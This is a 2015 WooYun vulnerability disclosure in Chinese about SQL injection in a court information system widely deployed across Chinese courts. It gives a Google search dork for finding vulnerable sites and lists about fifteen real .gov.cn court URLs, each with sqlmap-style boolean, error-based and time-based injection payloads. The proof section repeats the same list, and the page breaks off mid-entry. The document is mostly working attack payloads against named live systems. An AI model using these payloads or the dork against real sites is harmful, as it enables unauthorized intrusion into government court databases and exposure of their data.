当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113971

漏洞标题:某在用法院系统通用型注入#2

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-05-14 10:48

修复时间:2015-08-17 08:28

公开时间:2015-08-17 08:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-14: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-22: 细节向第三方安全合作伙伴开放
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

法院系统。。

详细说明:

接上一个:

http://wooyun.org/bugs/wooyun-2015-0113942/trace/12dcf13f84ed5047f384d9566441c556


menuCode,SecMenuCode存在注入
谷歌关键词:inurl:ShowChannel.jsp?sys=

#1:http://www.fyfyssf.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 8401=8401 AND 'xykK'='xykK&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5484=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR
(122)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5484=5484) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(100)+CHAR(122)+CHAR(98)+CHAR(58))) AND 'auPv'='auPv&SecMe
nuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#2:http://www.mlfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 4342=CONVERT(INT,(CHAR(58)+
CHAR(118)+CHAR(117)+CHAR(117)+CHAR(58)+(SELECT (CASE WHEN (4342=4342) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(116)+CHAR(98)+CHAR(58))) AND 'eO
BN'='eOBN
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 7019=7019 AND 'luIr'='luIr&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5774=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR
(117)+CHAR(117)+CHAR(58)+(SELECT (CASE WHEN (5774=5774) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(102)+CHAR(116)+CHAR(98)+CHAR(58))) AND 'VANB'='VANB&SecM
enuCode=0
---
#3:http://www.qionghaifayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 6634=CONVERT(INT,(CHAR(58)+
CHAR(122)+CHAR(118)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (6634=6634) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(109)+CHAR(117)+CHAR(58))) AND 'T
gwI'='TgwI
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 2501=2501 AND 'OEyQ'='OEyQ&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 4829=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR
(118)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (4829=4829) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(108)+CHAR(109)+CHAR(117)+CHAR(58))) AND 'FVFV'='FVFV&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#4:http://www.syzy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
#5:http://www.lingaofayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 3246=CONVERT(INT,(CHAR(58)+
CHAR(116)+CHAR(110)+CHAR(111)+CHAR(58)+(SELECT (CASE WHEN (3246=3246) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'H
IUD'='HIUD
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 7620=7620 AND 'jTqO'='jTqO&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 8041=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR
(110)+CHAR(111)+CHAR(58)+(SELECT (CASE WHEN (8041=8041) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(118)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'mGRy'='mGRy&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#6:http://sfpt.hkfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 4746=CONVERT(INT,(CHAR(58)+
CHAR(114)+CHAR(118)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4746=4746) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(115)+CHAR(107)+CHAR(58))) AND 'A
OWj'='AOWj
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9255=9255 AND 'xYVF'='xYVF&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9491=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR
(118)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (9491=9491) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(100)+CHAR(115)+CHAR(107)+CHAR(58))) AND 'UPiU'='UPiU&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#7:http://sf.hicourt.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 1700=CONVERT(INT,(CHAR(58)+
CHAR(101)+CHAR(98)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (1700=1700) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'XJ
Kw'='XJKw
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 3399=3399 AND 'kSEf'='kSEf&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 3945=CONVERT(INT,(CHAR(58)+CHAR(101)+CHAR
(98)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (3945=3945) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(100)+CHAR(122)+CHAR(108)+CHAR(58))) AND 'mxcz'='mxcz&SecM
enuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#8:http://www.ypfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 7266=CONVERT(INT,(CHAR(58)+
CHAR(122)+CHAR(117)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (7266=7266) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'v
QMP'='vQMP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 2600=2600 AND 'UYwU'='UYwU&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 2230=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR
(117)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (2230=2230) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(115)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'mnIS'='mnIS&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#9:http://www.ledongfayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 9259=CONVERT(INT,(CHAR(58)+
CHAR(116)+CHAR(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (9259=9259) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(119)+CHAR(100)+CHAR(58))) AND 'q
loP'='qloP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 7950=7950 AND 'pOHY'='pOHY&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5478=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR
(108)+CHAR(121)+CHAR(58)+(SELECT (CASE WHEN (5478=5478) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(109)+CHAR(119)+CHAR(100)+CHAR(58))) AND 'yzeV'='yzeV&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#10:http://sf.hkhsfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 1939=CONVERT(INT,(CHAR(58)+
CHAR(119)+CHAR(113)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (1939=1939) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(100)+CHAR(113)+CHAR(58))) AND 'w
LFS'='wLFS
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9854=9854 AND 'NQQi'='NQQi&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5081=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR
(113)+CHAR(108)+CHAR(58)+(SELECT (CASE WHEN (5081=5081) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(102)+CHAR(100)+CHAR(113)+CHAR(58))) AND 'kWzD'='kWzD&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#11:http://www.wzsfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=GSXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=GSXW&SecMenuCode=0' AND 4093=CONVERT(INT,(CHAR(58)+
CHAR(122)+CHAR(108)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (4093=4093) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(100)+CHAR(121)+CHAR(58))) AND 'R
OAC'='ROAC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=GSXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=GSXW' AND 2393=2393 AND 'shXW'='shXW&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=GSXW' AND 3328=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR
(108)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (3328=3328) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(109)+CHAR(100)+CHAR(121)+CHAR(58))) AND 'dAjD'='dAjD&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=GSXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#12:http://www.hkqsfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 8158=CONVERT(INT,(CHAR(58)+
CHAR(113)+CHAR(113)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (8158=8158) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(106)+CHAR(104)+CHAR(112)+CHAR(58))) AND 'T
XQP'='TXQP
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 6530=6530 AND 'oMKF'='oMKF&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5402=CONVERT(INT,(CHAR(58)+CHAR(113)+CHAR
(113)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (5402=5402) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(106)+CHAR(104)+CHAR(112)+CHAR(58))) AND 'cLVD'='cLVD&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#13:http://www.hnbtcourt.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9924=9924 AND 'sxxn'='sxxn&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 6065=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR
(116)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (6065=6065) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(114)+CHAR(99)+CHAR(101)+CHAR(58))) AND 'vjKv'='vjKv&SecMe
nuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 2631=CONVERT(INT,(CHAR(58)+
CHAR(116)+CHAR(116)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2631=2631) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(114)+CHAR(99)+CHAR(101)+CHAR(58))) AND 'Wfd
J'='WfdJ
---
#14:http://www.chengmaifayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=DZQK&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=DZQK&SecMenuCode=0' AND 6756=CONVERT(INT,(CHAR(58)+
CHAR(98)+CHAR(106)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (6756=6756) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(117)+CHAR(108)+CHAR(58))) AND 'gg
lR'='gglR
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=DZQK&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=DZQK' AND 7738=7738 AND 'jXNQ'='jXNQ&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=DZQK' AND 2375=CONVERT(INT,(CHAR(58)+CHAR(98)+CHAR(
106)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (2375=2375) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(118)+CHAR(117)+CHAR(108)+CHAR(58))) AND 'qdWv'='qdWv&SecM
enuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=DZQK' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#15:http://www.dinganfayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5100=5100 AND 'Zefw'='Zefw&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5859=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR
(99)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (5859=5859) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(120)+CHAR(58))) AND 'ebFc'='ebFc&SecMe
nuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 7129=CONVERT(INT,(CHAR(58)+
CHAR(114)+CHAR(99)+CHAR(118)+CHAR(58)+(SELECT (CASE WHEN (7129=7129) THEN CHAR(4
9) ELSE CHAR(48) END))+CHAR(58)+CHAR(97)+CHAR(109)+CHAR(120)+CHAR(58))) AND 'eCe
n'='eCen
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
---


法院1.png


法院2.png


法院3.png


法院4.png


法院5.png


法院6.png


法院7.png


法院8.png


法院9.png


法院10.png


法院11.png


法院12.png


法院13.png


法院14.png

漏洞证明:

接上一个:

http://wooyun.org/bugs/wooyun-2015-0113942/trace/12dcf13f84ed5047f384d9566441c556


menuCode,SecMenuCode存在注入
谷歌关键词:inurl:ShowChannel.jsp?sys=

#1:http://www.fyfyssf.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 8401=8401 AND 'xykK'='xykK&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5484=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR
(122)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5484=5484) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(100)+CHAR(122)+CHAR(98)+CHAR(58))) AND 'auPv'='auPv&SecMe
nuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#2:http://www.mlfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 4342=CONVERT(INT,(CHAR(58)+
CHAR(118)+CHAR(117)+CHAR(117)+CHAR(58)+(SELECT (CASE WHEN (4342=4342) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(116)+CHAR(98)+CHAR(58))) AND 'eO
BN'='eOBN
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 7019=7019 AND 'luIr'='luIr&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 5774=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR
(117)+CHAR(117)+CHAR(58)+(SELECT (CASE WHEN (5774=5774) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(102)+CHAR(116)+CHAR(98)+CHAR(58))) AND 'VANB'='VANB&SecM
enuCode=0
---
#3:http://www.qionghaifayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 6634=CONVERT(INT,(CHAR(58)+
CHAR(122)+CHAR(118)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (6634=6634) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(109)+CHAR(117)+CHAR(58))) AND 'T
gwI'='TgwI
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 2501=2501 AND 'OEyQ'='OEyQ&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 4829=CONVERT(INT,(CHAR(58)+CHAR(122)+CHAR
(118)+CHAR(113)+CHAR(58)+(SELECT (CASE WHEN (4829=4829) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(108)+CHAR(109)+CHAR(117)+CHAR(58))) AND 'FVFV'='FVFV&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#4:http://www.syzy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
#5:http://www.lingaofayuan.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 3246=CONVERT(INT,(CHAR(58)+
CHAR(116)+CHAR(110)+CHAR(111)+CHAR(58)+(SELECT (CASE WHEN (3246=3246) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(118)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'H
IUD'='HIUD
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 7620=7620 AND 'jTqO'='jTqO&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 8041=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR
(110)+CHAR(111)+CHAR(58)+(SELECT (CASE WHEN (8041=8041) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(118)+CHAR(109)+CHAR(114)+CHAR(58))) AND 'mGRy'='mGRy&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW' WAITFOR DELAY '0:0:5'--&SecMenuCode=0
---
#6:http://sfpt.hkfy.gov.cn/sfpt/channel/ShowChannel.jsp?sys=X1&menuCode=KFXW&SecMenuCode=0
Place: GET
Parameter: SecMenuCode
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' AND 4746=CONVERT(INT,(CHAR(58)+
CHAR(114)+CHAR(118)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4746=4746) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(115)+CHAR(107)+CHAR(58))) AND 'A
OWj'='AOWj
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: sys=X1&menuCode=KFXW&SecMenuCode=0' WAITFOR DELAY '0:0:5'--
Place: GET
Parameter: menuCode
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9255=9255 AND 'xYVF'='xYVF&SecMenuCode=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: sys=X1&menuCode=KFXW' AND 9491=CONVERT(INT,(CHAR(58)+CHAR(114)+CHAR
(118)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (9491=9491) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(58)+CHAR(100)+CHAR(115)+CHAR(107)+CHAR(58))) AND 'UPiU'='UPiU&Sec
MenuCode=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
